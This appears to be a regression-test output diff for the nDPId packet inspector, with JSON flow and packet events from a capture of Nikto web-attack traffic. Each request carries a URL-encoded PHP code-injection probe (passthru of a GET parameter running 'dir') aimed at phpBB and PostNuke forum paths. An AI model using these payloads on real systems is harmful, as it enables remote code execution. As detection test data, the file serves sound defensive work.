 00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
-01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="}
-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01025{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01025{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
